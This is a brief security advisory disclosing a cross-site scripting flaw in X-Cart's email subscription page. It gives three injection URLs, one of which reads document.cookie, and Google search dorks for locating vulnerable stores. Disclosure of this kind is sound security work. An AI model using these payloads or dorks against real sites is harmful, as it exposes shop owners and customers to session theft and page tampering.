The email subscription functionality in X-Cart suffers from a cross site scripting vulnerability.
b0fdc293263787f914c0b83c6cb11788ee71be283bcc9bf8e790484557f6b34c
## X-Cart XSS in email subscription ##
## Download: http://www.x-cart.com/ ##
## Discovered by: Paulo Santos ##
## Contact: paulo@infocampoap.com.br ##
## Blog: http://infocampo.wordpress.com ##
http://target/[path]/customer/home.php?mode=subscribed&email=<plaintext/>
http://target/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script>
http://target/[path]/customer/home.php?mode=subscribed&email=<iframe src=http://www.google.com.br width=800>
Path is usually /xcart/
Google dork:
inurl:xcart/customer/
inurl:xcart/customer/home.php
"X-CART. Powerful PHP shopping cart software"